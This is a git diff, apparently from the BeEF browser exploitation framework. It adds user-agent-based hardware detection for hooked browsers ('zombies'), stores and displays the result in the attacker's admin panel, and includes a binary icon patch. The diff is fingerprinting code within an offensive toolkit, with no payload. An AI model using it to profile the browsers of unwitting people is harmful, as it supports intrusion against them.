required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +beef.hardware = { + + ua: navigator.userAgent, + + isWinPhone: function() { + return (this.ua.match('(Windows Phone)')) ? true : false; + }, + + isIphone: function() { + return (this.ua.indexOf('iPhone') != -1) ? true : false; + }, + + isIpad: function() { + return (this.ua.indexOf('iPad') != -1) ? true : false; + }, + + isIpod: function() { + return (this.ua.indexOf('iPod') != -1) ? true : false; + }, + + isNokia: function() { + return (this.ua.match('(Maemo Browser)|(Symbian)|(Nokia)')) ? true : false; + }, + + isBlackBerry: function() { + return (this.ua.match('BlackBerry')) ? true : false; + }, + + isZune: function() { + return (this.ua.match('ZuneWP7')) ? true : false; + }, + + isKindle: function() { + return (this.ua.match('Kindle')) ? true : false; + }, + + getName: function() { + + if(this.isNokia()) { + + if (this.ua.indexOf('Maemo Browser') != -1) return 'Maemo'; + if (this.ua.match('(SymbianOS)|(Symbian OS)')) return 'SymbianOS'; + if (this.ua.indexOf('Symbian') != -1) return 'Symbian'; + + //return 'Nokia'; + } + + if (this.isWinPhone()) return 'Windows Phone'; + if (this.isBlackBerry()) return 'BlackBerry'; + if (this.isIphone()) return 'iPhone'; + if (this.isIpad()) return 'iPad'; + if (this.isIpod()) return 'iPod'; + if (this.isKindle()) return 'Kindle'; + + return 'unknown'; + } +}; + +beef.regCmp('beef.net.hardware'); diff --git a/core/main/client/os.js b/core/main/client/os.js index c133edcc9..9ccea8a9c 100644 --- a/core/main/client/os.js +++ b/core/main/client/os.js @@ -72,7 +72,11 @@ beef.os = { isMacintosh: function() { return (this.ua.match('(Mac_PowerPC)|(Macintosh)|(MacIntel)')) ? true : false; }, - + + isWinPhone: function() { + return (this.ua.match('(Windows Phone)')) ? true : false; + }, + isIphone: function() { return (this.ua.indexOf('iPhone') != -1) ? true : false; }, @@ -97,6 +101,10 @@ beef.os = { return (this.ua.match('BlackBerry')) ? true : false; }, + isWebOS: function() { + return (this.ua.match('webOS')) ? true : false; + }, + isQNX: function() { return (this.ua.match('QNX')) ? true : false; }, @@ -139,11 +147,14 @@ beef.os = { if(this.isSunOS()) return 'Sun OS'; //iPhone - if (this.isIphone()) return 'iPhone'; + if (this.isIphone()) return 'iOS'; //iPad - if (this.isIpad()) return 'iPad'; + if (this.isIpad()) return 'iOS'; //iPod - if (this.isIpod()) return 'iPod'; + if (this.isIpod()) return 'iOS'; + + // zune + //if (this.isZune()) return 'Zune'; //macintosh if(this.isMacintosh()) { @@ -156,6 +167,7 @@ beef.os = { //others if(this.isQNX()) return 'QNX'; if(this.isBeOS()) return 'BeOS'; + if(this.isWebOS()) return 'webOS'; return 'unknown'; } diff --git a/core/main/constants/hardware.rb b/core/main/constants/hardware.rb new file mode 100644 index 000000000..63958a210 --- /dev/null +++ b/core/main/constants/hardware.rb @@ -0,0 +1,73 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +module BeEF +module Core +module Constants + + # @note The hardware's strings for hardware detection. + module Hardware + + HW_UNKNOWN_IMG = 'pc.png' + HW_IPHONE_UA_STR = 'iPhone' + HW_IPHONE_IMG = 'iphone.jpg' + HW_IPAD_UA_STR = 'iPad' + HW_IPAD_IMG = 'ipad.png' + HW_IPOD_UA_STR = 'iPod' + HW_IPOD_IMG = 'ipod.jpg' + HW_BLACKBERRY_UA_STR = 'BlackBerry' + HW_BLACKBERRY_IMG = 'blackberry.png' + HW_ANDROID_UA_STR = 'Android' + HW_ANDROID_IMG = 'android.png' + HW_WINPHONE_UA_STR = 'Windows Phone' + HW_WINPHONE_IMG = 'win.png' + HW_ZUNE_UA_STR = 'ZuneWP7' + HW_ZUNE_IMG = 'zune.gif' + HW_KINDLE_UA_STR = 'Kindle' + HW_KINDLE_IMG = 'kindle.png' + HW_ALL_UA_STR = 'All' + + # Attempt to match operating system string to constant + # @param [String] name Name of operating system + # @return [String] Constant name of matched operating system, returns 'ALL' if nothing are matched + def self.match_hardware(name) + case name.downcase + when /iphone/ + HW_IPHONE_UA_STR + when /ipad/ + HW_IPAD_UA_STR + when /ipod/ + HW_IPOD_UA_STR + when /blackberry/ + HW_BLACKBERRY_UA_STR + when /android/ + HW_ANDROID_UA_STR + when /windows phone/ + HW_WINPHONE_UA_STR + when /zune/ + HW_ZUNE_UA_STR + when /kindle/ + HW_KINDLE_UA_STR + else + 'ALL' + end + end + + end + +end +end +end diff --git a/core/main/constants/os.rb b/core/main/constants/os.rb index 2e86f1e39..15c8a1b67 100644 --- a/core/main/constants/os.rb +++ b/core/main/constants/os.rb @@ -29,17 +29,19 @@ module Constants OS_MAC_UA_STR = 'Mac' OS_MAC_IMG = 'mac.png' OS_QNX_UA_STR = 'QNX' - OS_QNX_IMG = 'qnx.ico' + OS_QNX_IMG = 'qnx.ico' OS_BEOS_UA_STR = 'BeOS' - OS_BEOS_IMG = 'beos.png' + OS_BEOS_IMG = 'beos.png' OS_OPENBSD_UA_STR = 'OpenBSD' OS_OPENBSD_IMG = 'openbsd.ico' + OS_IOS_UA_STR = 'iOS' + OS_IOS_IMG = 'ios.png' OS_IPHONE_UA_STR = 'iPhone' - OS_IPHONE_IMG = 'iphone.png' + OS_IPHONE_IMG = 'iphone.jpg' OS_IPAD_UA_STR = 'iPad' - OS_IPAD_IMG = 'ipad.png' + OS_IPAD_IMG = 'ipad.png' OS_IPOD_UA_STR = 'iPod' - OS_IPOD_IMG = 'ipod.jpg' + OS_IPOD_IMG = 'ipod.jpg' OS_MAEMO_UA_STR = 'Maemo' OS_MAEMO_IMG = 'maemo.ico' OS_BLACKBERRY_UA_STR = 'BlackBerry' @@ -65,12 +67,8 @@ module Constants OS_BEOS_UA_STR when /openbsd/ OS_OPENBSD_UA_STR - when /iphone/ - OS_IPHONE_UA_STR - when /ipad/ - OS_IPAD_UA_STR - when /ipod/ - OS_IPOD_UA_STR + when /ios/, /iphone/, /ipad/, /ipod/ + OS_IOS_UA_STR when /maemo/ OS_MAEMO_UA_STR when /blackberry/ diff --git a/core/main/handlers/browserdetails.rb b/core/main/handlers/browserdetails.rb index dfb3b8040..1ca83f165 100644 --- a/core/main/handlers/browserdetails.rb +++ b/core/main/handlers/browserdetails.rb @@ -118,6 +118,14 @@ module BeEF self.err_msg "Invalid operating system name returned from the hook browser's initial connection." end + # get and store the hardware name + hw_name = get_param(@data['results'], 'Hardware') + if BeEF::Filters.is_valid_hwname?(hw_name) + BD.set(session_id, 'Hardware', hw_name) + else + self.err_msg "Invalid hardware name returned from the hook browser's initial connection." + end + # get and store the date date_stamp = get_param(@data['results'], 'DateStamp') if BeEF::Filters.is_valid_date_stamp?(date_stamp) diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb index 92473876d..b7ca90bae 100644 --- a/core/main/handlers/modules/beefjs.rb +++ b/core/main/handlers/modules/beefjs.rb @@ -32,9 +32,9 @@ module Modules # @note we load websocket library only if ws server is enabled in config.yalm # check in init.js if config.get("beef.http.websocket.enable") - js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js) + js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js websocket.js) else - js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js) + js_sub_files = %w(lib/jquery-1.5.2.min.js lib/evercookie.js lib/json2.js beef.js browser.js browser/cookie.js browser/popup.js session.js os.js hardware.js dom.js logger.js net.js updater.js encode/base64.js encode/json.js net/local.js init.js mitb.js net/dns.js) end # @note construct the beefjs string from file(s) diff --git a/core/main/models/browserdetails.rb b/core/main/models/browserdetails.rb index 8a8f79c61..ae3868691 100644 --- a/core/main/models/browserdetails.rb +++ b/core/main/models/browserdetails.rb @@ -94,9 +94,10 @@ module Models return BeEF::Core::Constants::Os::OS_QNX_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_QNX_UA_STR return BeEF::Core::Constants::Os::OS_BEOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BEOS_UA_STR return BeEF::Core::Constants::Os::OS_OPENBSD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_OPENBSD_UA_STR - return BeEF::Core::Constants::Os::OS_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR - return BeEF::Core::Constants::Os::OS_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR - return BeEF::Core::Constants::Os::OS_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR + return BeEF::Core::Constants::Os::OS_WEBOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_WEBOS_UA_STR + return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPHONE_UA_STR + return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPAD_UA_STR + return BeEF::Core::Constants::Os::OS_IOS_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_IPOD_UA_STR return BeEF::Core::Constants::Os::OS_MAEMO_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAEMO_UA_STR return BeEF::Core::Constants::Os::OS_MAC_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_MAC_UA_STR return BeEF::Core::Constants::Os::OS_BLACKBERRY_IMG if ua_string.include? BeEF::Core::Constants::Os::OS_BLACKBERRY_UA_STR @@ -105,6 +106,26 @@ module Models BeEF::Core::Constants::Os::OS_UNKNOWN_IMG end + # + # Returns the icon representing the hardware the + # zombie is running on (i.e. iPhone, BlackBerry) + # + def self.hw_icon(session_id) + + ua_string = get(session_id, 'BrowserReportedName') + + return BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG if ua_string.nil? + + return BeEF::Core::Constants::Hardware::HW_WINPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_WINPHONE_UA_STR + return BeEF::Core::Constants::Hardware::HW_ZUNE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_ZUNE_UA_STR + return BeEF::Core::Constants::Hardware::HW_IPHONE_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPHONE_UA_STR + return BeEF::Core::Constants::Hardware::HW_IPAD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPAD_UA_STR + return BeEF::Core::Constants::Hardware::HW_IPOD_IMG if ua_string.include? BeEF::Core::Constants::Hardware::HW_IPOD_UA_STR + + BeEF::Core::Constants::Hardware::HW_UNKNOWN_IMG + + end + end end diff --git a/extensions/admin_ui/controllers/modules/modules.rb b/extensions/admin_ui/controllers/modules/modules.rb index b30573a0d..827f6c241 100644 --- a/extensions/admin_ui/controllers/modules/modules.rb +++ b/extensions/admin_ui/controllers/modules/modules.rb @@ -136,7 +136,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController # set and add the return values for the os name os_name = BD.get(zombie_session, 'OsName') - if not host_name.nil? + if not os_name.nil? encoded_os_name = CGI.escapeHTML(os_name) encoded_os_name_hash = { 'OS Name' => encoded_os_name } @@ -148,6 +148,21 @@ class Modules < BeEF::Extension::AdminUI::HttpController summary_grid_hash['results'].push(page_name_row) # add the row end + + # set and add the return values for the hardware name + hw_name = BD.get(zombie_session, 'Hardware') + if not hw_name.nil? + encoded_hw_name = CGI.escapeHTML(hw_name) + encoded_hw_name_hash = { 'Hardware' => encoded_hw_name } + + page_name_row = { + 'category' => 'Host', + 'data' => encoded_hw_name_hash, + 'from' => 'Initialization' + } + + summary_grid_hash['results'].push(page_name_row) # add the row + end # set and add the return values for the browser name browser_name = BD.get(zombie_session, 'BrowserName') diff --git a/extensions/admin_ui/controllers/panel/panel.rb b/extensions/admin_ui/controllers/panel/panel.rb index c67ec41f7..56b6a708c 100644 --- a/extensions/admin_ui/controllers/panel/panel.rb +++ b/extensions/admin_ui/controllers/panel/panel.rb @@ -90,10 +90,12 @@ class Panel < BeEF::Extension::AdminUI::HttpController browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session) os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session) os_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'OsName') + hw_icon = BeEF::Core::Models::BrowserDetails.hw_icon(hooked_browser.session) + hw_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'Hardware') domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName') has_flash = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash') has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket') - date_stamp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp') + date_stamp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp') return { 'session' => hooked_browser.session, @@ -105,6 +107,8 @@ class Panel < BeEF::Extension::AdminUI::HttpController 'browser_icon' => browser_icon, 'os_icon' => os_icon, 'os_name' => os_name, + 'hw_icon' => hw_icon, + 'hw_name' => hw_name, 'has_flash' => has_flash, 'has_web_sockets' => has_web_sockets, 'date_stamp' => date_stamp diff --git a/extensions/admin_ui/media/images/icons/ios.png b/extensions/admin_ui/media/images/icons/ios.png new file mode 100644 index 0000000000000000000000000000000000000000..de94a27ce9682ce1ce4d2c84248b879043ffdb9c GIT binary patch literal 38666 zcmb5V1yh_&(>9DlaCdiiclY2L+}+(BLU4Bo?iPZ(y9L+9-C=S0_PU>Xf52C@XKnRX zowGAN-93FA-4m^%B!dKx4-W zH5~S5zxN8qLQB=;hW4yMN~N2U<+fKrwIdj$BJg4Qv@*~Dc$W2cH@V+)PsChmK1{FG zXxM3imGN6=m|j$;#uST`QLFKnW^lv*ldHi@{-3M`K46OVe{u~(IOx^?$vV(*F`EA; zH^QT0SO1^a3dwnB)#DN zX1f?KKtNfWJ7|SKTjN>pk}X=_mqTr0zl+=Bf}lW$03t;atL68B0imZ&5e_eVQ&)bt z0avQc?QMO7_Qs}GJ^enAo?aV^F)@&?c=VJ-UKV+Jfm_!BUybK0^_tbqepdm5e%pS4 z&5I-q8s%jg+uSG@`r?Yo%oBHk7Kc)DCT3%hj=SOQoSd!&03V-#uMh3skIU;JRo9iQ zCX&yw(V0A<)&}RlYL!qX<0ukz|7aVfQrnU}I`ck0lsXrh+YR))|2G9K`c=?hU-mx7 z^u9i}_AFeE;9T{*)uMD?UcB5R$Q+fIm38doNGDnFU0POeT(UF#C7QkO)+%4JZ)rbF zohaSI$0lW5W*QEl-e1dj^}lGO`Fv;!x{Y%R7~Px6*?zx)MA;0w+HB9t!khflzjWcw zA1q2%a_!Qq;b~7J-~W}`sn^MHKKT|W-L8>GE06h~N+ot#C;ROk9fMvug6`I40|TwR zopy#uduaE1%yR7m8k)YkHuM6$K%lDUipl>&3)Tq9O#> zdcHjceW8fl%LI)u9v=sO9s@qEyhua>$>oxHqXk?TshSua+XL4SgmlE(=j}Nk^>Q|l zSQ9n~2+j#QZ3fh(UElV{ObDp_V(Hu0FY4ZnA|{{Mg@3+#0iyf zmUf!(VEE4?>6}u74oP}G>py1!YujrdC&dXpmqgdu+4-(Qy=(os<XHU~BPG8ku=jvYo5|Nu7J(7>r(d(W!$A0hPd315G zzv3*2p`z?-1FjXZtCkA zY^<)z7XRd9_AVo4YD3xQ#^$k)aqFjgx-D-@Qz{VD(%%DZ7{9fY>U-~(Q}2gY&{tf7 z@GAnz>l(^Rxn+yj<6axWj76yiT?85KVC`id0mEcYP7dm4^M*rT`7!u}pyC{uq)jP$ z3JbD#Vf>-Iz>N@@H`l|lB@NtZK!Eap5t7jX65P1=gXIgD@pYAR{k0P%d{c;$M&JDL z5wPOHkfxSPT`B986W6`fJv>}Wz~lJ$2NT@8AOK~OYI3in&zKI8-G=W5X@C+}I^J^L zG#RvcS_&459oVRhpt$}?1tx+z^D)!=@nrO|-n#uY221P%peR+VoVQ+$Kko2M9RjOe z4m@8cmki>0eDn-AHvV|;gGCtUYjqf9N3aV=?b zxkd6dUI1_d1Y8FK{1}=iJ_8Y^^i}A29`ytSIy?RRCMPEeHacVVOe(`q@iwsaL!-`~ zGoyE{Py1k{Ho+O2ael!l_pR8LQtn-ys>}G#s&Xz4kT8LC(*t}^pZ(}32|OCARKE^5 z_`pcv*rJ8lx8yVI+*(^*1^aSy2uoHe*b_s6+_M*K?&Up5eW@HdsUhLK#&;9xnpD zoSc<<7E`Db-cq$SU_gVv^|L-_0HJPaW@<<;D?BA6@GeQ@psu>y_EqO>wD4*Fz#}xc{(revbh;} zSv&36s#mFXhT&nkF|7qjYPA;3PY(xi)>jy=2PPLEEa@hTTxF%l{ahUzCLy3&5Kbb8 zmdDTM^lluTg&%{J-T-EThI6;oJyH<(=mu7W5_lrfbnn*r7B{_hIh;n2LjWhTabF#H zk^vzXXt|RCE{0vE-u4%&%mOSmSm1{7mYN1~)ZSIgA-KXplm3wOX1#W~@x_DzXRk;B4lUTJP7(Di$VxnZcbtb4kDdGJ+SEBhwT+#8Qe2TzK zOkltvGnkD&C$xKf?}iMV0`K+oM*-_PosECHT6*SfoBezBBY5W;`&}s6@mJ#Rs~qM` zaKT*R5!h6JY0VvRQ_J)9&o&Cqq6~mtE!$k@iFge>=}-MUOGRXOpMwbZqCInMO)C1h zbPB3pa};?EK~YjtH0bVdKm3=LcezC=AHY(fX=j2fsTz9vT^nmNOF~o3G|V-eq6pno zTuOakqq2d>U6N?UW587fS)ta_t;ofzf&3A<3axJhFlC|?qA0y?}oVv0NtEvS-Tb$*FGzrNqIIM&ottSkWK zO-`P{2cqRrHs$dZq7B;FBchyHk8NxS$(S(nG(~@h#ofySV0d9d^yo7PuQ;;>tdwRn z8S)uLwL$3xUvb-q1oK5x0ysS3j%D)7dVL@(Y;+~vbZRc}J@T>PLl{-A zt8+B$aQ!Z;1rB-A)7EHCpFYjsAcqCf1T>}v zsl8Wm42#kFmQ%Z7TYKlCZA;l%iWpyP5$=a#mUsLyIi_Yxov9@T(ui7BWNLmPKPd+9 zPoA6i28}9>36mX2$tO>4ucwx4J}-Y;ae<<>gSr1u0(M<@_Xq-uzCK{x<)ZA^M_qj( zO%1y5o2YAJ>S&weFO?xqg>Tj1HyWZp-}+o2Zn*fA_b|!FY}@tgzZcD?m|9u+d6>OD zjQcoCf)CV;B4bUAGlB9T0dBNnq5(=d76XHhj=$I*3k`;K+P2N|X@5l<0keg|qFDE6 z$c-`so`R+$IvTmM(Xf!cArO¨_I7(a}HJ^_A2`jm;b!?oaGrHY+LO?Ff#wYyTIa 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 